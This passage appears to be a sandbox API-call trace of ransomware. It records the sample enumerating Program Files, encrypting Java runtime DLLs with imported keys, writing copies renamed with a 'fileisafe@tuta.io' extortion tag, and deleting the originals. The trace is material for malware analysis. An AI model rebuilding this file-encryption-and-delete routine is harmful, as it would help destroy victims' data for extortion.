pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.930] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=18432) returned 1 [0148.930] CloseHandle (hObject=0x2f8) returned 1 [0148.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui")) returned 0x20 [0148.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.930] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.930] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=99840) returned 1 [0148.930] CloseHandle (hObject=0x2f8) returned 1 [0148.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll")) returned 0x20 [0148.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.931] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.931] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=376320) returned 1 [0148.931] CloseHandle (hObject=0x2f8) returned 1 [0148.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll")) returned 0x20 [0148.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.931] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.932] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=698368) returned 1 [0148.932] CloseHandle (hObject=0x2f8) returned 1 [0148.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll")) returned 0x20 [0148.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.932] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.933] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=54784) returned 1 [0148.933] CloseHandle (hObject=0x2f8) returned 1 [0148.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll")) returned 0x20 [0148.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.933] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.934] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=117248) returned 1 [0148.934] CloseHandle (hObject=0x2f8) returned 1 [0148.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll")) returned 0x20 [0148.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.934] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.935] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=16384) returned 1 [0148.935] CloseHandle (hObject=0x2f8) returned 1 [0148.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll")) returned 0x20 [0148.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.936] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.936] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=942080) returned 1 [0148.936] CloseHandle (hObject=0x2f8) returned 1 [0148.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll")) returned 0x20 [0148.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.937] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.937] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77824) returned 1 [0148.937] CloseHandle (hObject=0x2f8) returned 1 [0148.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll")) returned 0x20 [0148.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.937] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.937] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=9804) returned 1 [0148.937] CloseHandle (hObject=0x2f8) returned 1 [0148.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0x20 [0148.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.938] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.939] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=9975) returned 1 [0148.939] CloseHandle (hObject=0x2f8) returned 1 [0148.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0148.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.939] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.125] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=868352) returned 1 [0149.126] CloseHandle (hObject=0x2f8) returned 1 [0149.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll")) returned 0x20 [0149.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0149.126] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.128] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=49688) returned 1 [0149.128] CloseHandle (hObject=0x2f8) returned 1 [0149.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll")) returned 0x20 [0149.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0149.128] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.129] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1516608) returned 1 [0149.129] CloseHandle (hObject=0x2f8) returned 1 [0149.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll")) returned 0x20 [0149.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.130] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.130] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.130] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac30b0) returned 1 [0149.130] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.130] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x110100, lpOverlapped=0x0) returned 1 [0149.154] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x110100, dwBufLen=0x110100 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x110100) returned 1 [0149.155] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x110100, lpOverlapped=0x0) returned 1 [0149.322] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x62340, lpOverlapped=0x0) returned 1 [0149.323] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x62350, dwBufLen=0x62350 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x62350) returned 1 [0149.324] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x62350, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x62350, lpOverlapped=0x0) returned 1 [0149.333] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f70) returned 1 [0149.333] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.333] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0149.333] CryptDestroyKey (hKey=0xac2f70) returned 1 [0149.333] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0149.333] CryptDestroyKey (hKey=0xac30b0) returned 1 [0149.333] CloseHandle (hObject=0x2f8) returned 1 [0149.333] CloseHandle (hObject=0x308) returned 1 [0149.333] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll")) returned 1 [0149.338] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.339] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1026112) returned 1 [0149.339] CloseHandle (hObject=0x308) returned 1 [0149.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll")) returned 0x20 [0149.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.339] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.339] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.341] CryptImportKey 